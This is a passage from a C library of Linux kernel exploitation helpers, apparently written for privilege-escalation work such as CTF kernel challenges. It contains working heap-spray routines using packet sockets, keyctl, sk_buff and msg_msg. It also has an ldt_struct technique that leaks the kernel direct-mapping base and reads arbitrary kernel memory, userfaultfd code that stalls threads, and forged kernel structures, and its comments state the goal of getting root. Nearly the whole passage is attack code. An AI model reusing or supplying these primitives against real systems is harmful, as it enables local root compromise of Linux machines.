        close(tmp_fd);
    }

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    if (tmp_fd >= 0) {
        snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_uid);
        write(tmp_fd, edit, strlen(edit));
        close(tmp_fd);
    }

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    if (tmp_fd >= 0) {
        snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_gid);
        write(tmp_fd, edit, strlen(edit));
        close(tmp_fd);
    }
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
/* Userspace stand-in for a doubly linked list node: both links are stored as
 * raw 64-bit values rather than pointers. */
struct list_head {
/* forward link */
uint64_t next;
/* backward link */
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* note that we should create two processes:
* - the parent is the one that sends commands and gets root
* - the child creates an isolated namespace by calling unshare_setup(),
* receives commands from the parent and only carries them out
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/*
 * Command record sent from the parent to the spraying child over
 * cmd_pipe_req. Each allocation is (size * nr) bytes, aligned to PAGE_SIZE.
 */
struct pgv_page_request {
/* slot in the child's socket_fd[] table the command applies to */
int idx;
/* one of the CMD_* operation codes */
int cmd;
/* forwarded as tp_block_size when allocating */
unsigned int size;
/* forwarded as tp_block_nr when allocating */
unsigned int nr;
};

/* operation codes carried in pgv_page_request.cmd */
enum {
/* child calls create_socket_and_alloc_pages(size, nr) and stores the fd */
CMD_ALLOC_PAGE,
/* child close()s the fd stored at idx */
CMD_FREE_PAGE,
/* ends the child's command loop */
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/*
 * Open an AF_PACKET raw socket, select TPACKET_V1 and install a TX ring of
 * `nr` blocks of `size` bytes each (frame size fixed at 0x1000).
 *
 * Returns the socket fd on success. On failure a "[x] failed at ..." line is
 * printed and the negative result of the failing call is returned; a socket
 * that was already opened is closed first.
 */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req ring_req;
    int sock, tp_version, rc;

    sock = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (sock < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        return sock;
    }

    tp_version = TPACKET_V1;
    rc = setsockopt(sock, SOL_PACKET, PACKET_VERSION,
                    &tp_version, sizeof(tp_version));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        close(sock);
        return rc;
    }

    /* the frame count is derived so that frames exactly fill the blocks */
    memset(&ring_req, 0, sizeof(ring_req));
    ring_req.tp_block_size = size;
    ring_req.tp_block_nr = nr;
    ring_req.tp_frame_size = 0x1000;
    ring_req.tp_frame_nr = (ring_req.tp_block_size * ring_req.tp_block_nr)
                           / ring_req.tp_frame_size;

    rc = setsockopt(sock, SOL_PACKET, PACKET_TX_RING,
                    &ring_req, sizeof(ring_req));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        close(sock);
        return rc;
    }

    return sock;
}

/*
 * Create an AF_PACKET raw socket with a TPACKET_V3 RX ring and bind it to the
 * "lo" interface.
 *
 * block_size / block_nr  geometry of the ring (one pg_vec entry per block)
 * frame_size             frame size; must be non-zero, the frame count is
 *                        computed as block_size * block_nr / frame_size
 * sizeof_priv            stored in tp_sizeof_priv
 * timeout                stored in tp_retire_blk_tov
 *
 * Returns the socket fd. Any failure prints a diagnostic and exits with
 * status 1, so the function never returns an error.
 *
 * htons() and if_nametoindex() are declared in <arpa/inet.h> and <net/if.h>.
 */
int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
                        uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
    /* the frame count below divides by frame_size */
    if (frame_size == 0)
    {
        fprintf(stderr, "[-] packet_socket_setup: frame_size must be non-zero\n");
        exit(1);
    }

    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0)
    {
        perror("[-] socket (AF_PACKET)");
        exit(1);
    }

    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0)
    {
        perror("[-] setsockopt (PACKET_VERSION)");
        exit(1);
    }

    struct tpacket_req3 req3;
    memset(&req3, 0, sizeof(req3));
    req3.tp_sizeof_priv = sizeof_priv;
    req3.tp_block_nr = block_nr;
    req3.tp_block_size = block_size;
    req3.tp_frame_size = frame_size;
    req3.tp_frame_nr = (block_size * block_nr) / frame_size;
    req3.tp_retire_blk_tov = timeout;
    req3.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
    if (rv < 0)
    {
        perror("[-] setsockopt (PACKET_RX_RING)");
        exit(1);
    }

    /* every field not set here (hatype, halen, pkttype, addr) stays zero from
     * the memset */
    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");

    rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0)
    {
        perror("[-] bind (AF_PACKET)");
        exit(1);
    }

    return s;
}

/*
 * Parent side: ask the spraying child to allocate a ring of `nr` blocks of
 * `size` bytes and remember it in slot `idx`.
 *
 * Returns the value the child replied with (the result of
 * create_socket_and_alloc_pages() in the child), or -1 when the request could
 * not be written or the reply could not be read in full.
 */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t)sizeof(req))
        return -1;

    /* without a complete reply `ret` would be indeterminate */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t)sizeof(ret))
        return -1;

    return ret;
}

/*
 * Parent side: ask the spraying child to release the ring stored in slot
 * `idx`.
 *
 * Returns the value the child replied with (the result of close() in the
 * child), or -1 when the request could not be written or the reply could not
 * be read in full.
 */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t)sizeof(req))
        return -1;

    /* without a complete reply `ret` would be indeterminate */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t)sizeof(ret))
        return -1;

    return ret;
}

/*
 * Child side: command loop for the page sprayer.
 *
 * Enters fresh namespaces via unshare_setup(), then serves requests read from
 * cmd_pipe_req until CMD_EXIT arrives or the pipe stops delivering complete
 * requests. Every request is answered with one int on cmd_pipe_reply:
 *   CMD_ALLOC_PAGE  result of create_socket_and_alloc_pages()
 *   CMD_FREE_PAGE   result of close() on the stored fd
 *   CMD_EXIT        0
 *   anything else, or an idx outside [0, PGV_PAGE_NUM): -1
 */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* empty slots hold -1 so freeing a never-allocated slot fails cleanly */
    for (int i = 0; i < PGV_PAGE_NUM; i++)
        socket_fd[i] = -1;

    /* create an isolate namespace*/
    unshare_setup();

    /* handler request */
    do {
        /* EOF or a short read means the parent is gone: stop instead of
         * replaying the previous request forever */
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t)sizeof(req))
            break;

        ret = -1;
        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
        case CMD_FREE_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid page index: %d\n", req.idx);
                break;
            }
            if (req.cmd == CMD_ALLOC_PAGE) {
                ret = create_socket_and_alloc_pages(req.size, req.nr);
                socket_fd[req.idx] = ret;
            } else {
                ret = close(socket_fd[req.idx]);
                socket_fd[req.idx] = -1;
            }
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret)) != (ssize_t)sizeof(ret))
            break;
    } while (req.cmd != CMD_EXIT);
}

/*
 * Set up the page-spraying helper: create the request/reply pipes and fork a
 * child that runs spray_cmd_handler().
 *
 * The parent returns normally. The child never returns from this function: it
 * exits once the handler finishes, so it cannot fall through into the
 * caller's (parent-only) code. A pipe() or fork() failure is fatal via
 * err_exit(), because alloc_page()/free_page() would otherwise block forever.
 */
void prepare_pgv_system(void)
{
    pid_t child;

    /* pipe for pgv */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0)
        err_exit("pipe() for pgv command channel");

    /* child process for pages spray */
    child = fork();
    if (child < 0)
        err_exit("fork() for pgv sprayer");

    if (child == 0) {
        spray_cmd_handler();
        exit(EXIT_SUCCESS);
    }
}

/**
* IV - keyctl related
*/

/**
* MUSL does not ship `keyctl.h` either :(
* Luckily we only need a few macros for the exploitation,
* so defining them directly here is fine :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

/**
 * Create a "user"-type key in the process-specific keyring via add_key.
 *
 * @param description key description string
 * @param payload     key payload
 * @param plen        payload length in bytes
 * @return the raw syscall result narrowed to int
 */
int key_alloc(char *description, void *payload, size_t plen)
{
    long key_id = syscall(__NR_add_key, "user", description, payload, plen,
                          KEY_SPEC_PROCESS_KEYRING);

    return key_id;
}

/**
 * Replace the payload of key `keyid` (keyctl KEYCTL_UPDATE).
 *
 * @return the raw syscall result narrowed to int
 */
int key_update(int keyid, void *payload, size_t plen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);

    return rc;
}

/**
 * Read the contents of key `keyid` into `buffer` (keyctl KEYCTL_READ).
 *
 * @param buflen capacity of `buffer` in bytes
 * @return the raw syscall result narrowed to int
 */
int key_read(int keyid, void *buffer, size_t buflen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);

    return rc;
}

/**
 * Revoke key `keyid` (keyctl KEYCTL_REVOKE); the remaining arguments are
 * passed as zero.
 *
 * @return the raw syscall result narrowed to int
 */
int key_revoke(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);

    return rc;
}

/**
 * Unlink key `keyid` from the process-specific keyring (keyctl KEYCTL_UNLINK).
 *
 * @return the raw syscall result narrowed to int
 */
int key_unlink(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UNLINK, keyid,
                      KEY_SPEC_PROCESS_KEYRING);

    return rc;
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

/**
 * Fill `sk_socket` with SOCKET_NUM AF_UNIX stream socket pairs, later used
 * to spray sk_buff objects.
 *
 * @return 0 on success, -1 as soon as one socketpair() call fails
 */
int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
    int idx = 0;

    while (idx < SOCKET_NUM) {
        int rc = socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[idx]);

        if (rc < 0) {
            printf("[x] failed to create no.%d socket pair!\n", idx);
            return -1;
        }
        idx++;
    }

    return 0;
}

/**
 * Write `size` bytes from `buf` SK_BUFF_NUM times into the first end of each
 * of the SOCKET_NUM socket pairs.
 *
 * @return 0 on success, -1 on the first failing write()
 */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int i = 0; i < SOCKET_NUM; i++) {
        for (int j = 0; j < SK_BUFF_NUM; j++) {
            if (write(sk_socket[i][0], buf, size) < 0) {
                /* newline added so the message is flushed like its siblings */
                printf("[x] failed to spray %d sk_buff for %d socket!\n", j, i);
                return -1;
            }
        }
    }

    return 0;
}

/**
 * Drain what spray_sk_buff() queued: read `size` bytes into `buf`
 * SK_BUFF_NUM times from the second end of each socket pair, in pair order.
 *
 * @return 0 on success, -1 on the first failing read()
 */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total = SOCKET_NUM * SK_BUFF_NUM;

    for (int n = 0; n < total; n++) {
        int pair = n / SK_BUFF_NUM;
        ssize_t got = read(sk_socket[pair][1], buf, size);

        if (got < 0) {
            puts("[x] failed to received sk_buff!");
            return -1;
        }
    }

    return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/*
 * Userspace stand-in for a message header, filled in by build_msg() when
 * crafting message objects.
 * NOTE(review): field order presumably mirrors the kernel's struct msg_msg;
 * confirm against the target kernel version.
 */
struct msg_msg {
struct list_head m_list; /* list linkage (next / prev) */
uint64_t m_type; /* message type */
uint64_t m_ts; /* presumably the message text size -- TODO confirm */
uint64_t next; /* address of the following segment, stored as an integer */
uint64_t security; /* security pointer slot, stored as an integer */
};

/*
 * Userspace stand-in for a message segment header: a single link field.
 * NOTE(review): presumably mirrors the kernel's struct msg_msgseg; confirm.
 */
struct msg_msgseg {
uint64_t next; /* address of the following segment, stored as an integer */
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

/**
 * Create a new private System V message queue with mode 0666.
 *
 * @return the msgget() result
 */
int get_msg_queue(void)
{
    const int creation_flags = IPC_CREAT | 0666;

    return msgget(IPC_PRIVATE, creation_flags);
}

/**
 * Receive (and remove) a message of type `msgtyp` from queue `msqid` using
 * msgrcv() with no flags set.
 *
 * @return the msgrcv() result
 */
ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int no_flags = 0;
    ssize_t received = msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);

    return received;
}

/**
 * Send one message on queue `msqid`.
 *
 * `msgp` must point to a `struct msgbuf`; its mtype field is overwritten with
 * `msgtyp` and the payload is expected in msgbuf.mtext.
 *
 * @return the msgsnd() result
 */
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    struct msgbuf *message = msgp;

    message->mtype = msgtyp;

    return msgsnd(msqid, msgp, msgsz, 0);
}

/**
 * Copy a message out of queue `msqid` without removing it.
 *
 * With MSG_COPY, `msgtyp` selects the no.msgtyp message on the queue.
 * IPC_NOWAIT and MSG_NOERROR are set as well.
 *
 * @return the msgrcv() result
 */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Sometimes we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, it is copied directly here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
/*
 * Segment descriptor request handed to modify_ldt(); local copy of the
 * definition from `asm/ldt.h` so the file builds without that header.
 * The layout must stay exactly as is.
 */
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2; /* one of the MODIFY_LDT_CONTENTS_* values */
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/**
 * Fill `*desc` with the fixed descriptor used by the LDT helpers:
 * base_addr 0xff0000, entry_number 0x8000 / 8, every other field zero.
 *
 * The `lm` bit only exists in struct user_desc on x86-64, so it is only
 * touched there; this keeps the helper compiling on other targets.
 */
static inline void init_desc(struct user_desc *desc)
{
    desc->base_addr = 0xff0000;
    desc->entry_number = 0x8000 / 8;
    desc->limit = 0;
    desc->seg_32bit = 0;
    desc->contents = 0;
    desc->limit_in_pages = 0;
#ifdef __x86_64__
    desc->lm = 0;
#endif
    desc->read_exec_only = 0;
    desc->seg_not_present = 0;
    desc->useable = 0;
}

/**
* @brief Brute-force search for page_offset_base by repeatedly retargeting
*        ldt_struct->entries and probing with a modify_ldt() read.
*
* The search starts at 0xffff888000000000 and advances by burte_size after
* every failed probe. There is no upper bound on the loop.
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries; called as
*        ldt_momdifier(momdifier_args, candidate_address)
* @param momdifier_args args of ldt_momdifier
* @param burte_size step added to the candidate after each failed probe
* @return size_t the first candidate for which the probe returned a positive
*         value, or (size_t)-1 when the probe returned 0
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf; /* unused */
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
/* func 1: write the descriptor prepared by init_desc() into the LDT */
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
/* func 0: try to read 8 bytes of LDT contents into temp */
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
/* the read succeeded: keep the current candidate */
break;
}
else if (retval == 0) {
/* nothing was read at all: give up and report failure */
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
/* negative result: the probe failed, move on to the next candidate */
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief Read 0x8000 bytes starting at a given kernel address into res_buf.
* ldt_guessing_direct_mapping_area() should be called first, and this
* function should be used in that same caller process.
*
* The actual modify_ldt() read runs in a forked child, which sends the data
* back to the parent through a pipe.
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf destination buffer; must hold at least 0x8000 bytes
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp; /* unused */
int pipe_fd[2];

/* init descriptor info (desc is not used afterwards in this function) */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child: read the LDT contents and forward them to the parent */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent: wait for the child, then collect its 0x8000 bytes */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief Scan kernel memory in 0x8000-byte windows for specific content.
* ldt_guessing_direct_mapping_area() should be called first, and this
* function should be used in that same caller process.
*
* Starting at page_offset_base, each window is fetched with
* ldt_arbitrary_read() and handed to mem_finder. The loop only ends when
* mem_finder reports a hit; there is no upper bound on the scan.
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base leaked before
* @param mem_finder your own function to search a 0x8000-byte buf.
* It should look like `size_t func(void *args, char *buf)`, where `buf`
* holds the data read from the kernel by this function.
* Its return value is the offset inside `buf`, or `-1` for "not found"
* @param finder_args args passed to mem_finder
* @return size_t kernel address of the content found
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
/* fetch the current window into buf */
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
/* hit: translate the in-window offset to an address */
result_addr = search_addr + offset;
break;
}

/* miss: advance to the next window */
search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* MUSL does not ship `userfaultfd.h` either :(
* Luckily we only need a few macros for the exploitation,
* so defining them directly here is fine :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/*
 * Event record obtained by read() on a userfaultfd descriptor.
 * Local copy of the userfaultfd definition (the header may be unavailable);
 * the packed layout must not be changed.
 */
struct uffd_msg {
uint8_t event; /* event kind, e.g. UFFD_EVENT_PAGEFAULT */

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

/* event-specific payload */
union {
struct {
uint64_t flags;
uint64_t address; /* faulting address */
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

/* Argument of the UFFDIO_API ioctl (local copy of the userfaultfd definition). */
struct uffdio_api {
uint64_t api; /* set to UFFD_API by the caller */
uint64_t features; /* requested features; 0 when none are requested */
uint64_t ioctls;
};

/* Address range (start + length) used inside struct uffdio_register. */
struct uffdio_range {
uint64_t start;
uint64_t len;
};

/* Argument of the UFFDIO_REGISTER ioctl (local copy of the userfaultfd definition). */
struct uffdio_register {
struct uffdio_range range; /* region to register */
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode; /* UFFDIO_REGISTER_MODE_* bits */
uint64_t ioctls;
};


/* Argument of the UFFDIO_COPY ioctl (local copy of the userfaultfd definition). */
struct uffdio_copy {
uint64_t dst; /* destination address */
uint64_t src; /* source address */
uint64_t len; /* number of bytes to copy */
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

/*
 * userfaultfd monitor thread that deliberately never resolves the fault.
 *
 * `args` carries the userfaultfd descriptor cast to a pointer. The thread
 * waits for an event, reads it, and then sleeps for 100000000 seconds before
 * doing anything else, so the UFFDIO_COPY below is only reached if that
 * sleep ever returns. Judging by the function name, the purpose is to keep
 * the faulting thread stuck.
 *
 * Returns NULL after servicing one fault (in practice: after the long sleep).
 */
void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0; /* unused */
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
/* block without timeout until the userfaultfd becomes readable */
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... (the checks below run only after the sleep) */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

/* resolve the fault by copying temp_page_for_stuck over the faulting page */
uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

/**
 * Convenience wrapper: register [buf, buf + len) with userfaultfd using
 * uffd_handler_for_stucking_thread() as the monitor thread.
 */
void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
                                              void *buf, unsigned long len)
{
    void *(*stuck_handler)(void *) = uffd_handler_for_stucking_thread;

    register_userfaultfd(monitor_thread, buf, len, stuck_handler);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

/*
 * Userspace re-declaration of the kernel's seq_file object, for building or
 * inspecting its layout. The mutex is replaced by a 4 x 8-byte placeholder.
 * NOTE(review): layout depends on the kernel version/config; confirm.
 */
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

/*
 * Userspace re-declaration of the seq_file callback table: four function
 * pointers (start, stop, next, show).
 */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

/*
 * Userspace re-declaration of the tty driver callback table. Only the order
 * and count of the function pointers matter here.
 * NOTE(review): member order differs between kernel versions, and the
 * CONFIG_CONSOLE_POLL members are only present when that macro is defined at
 * build time; confirm against the target kernel.
 */
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
 * Userspace re-declaration of one pipe ring slot.
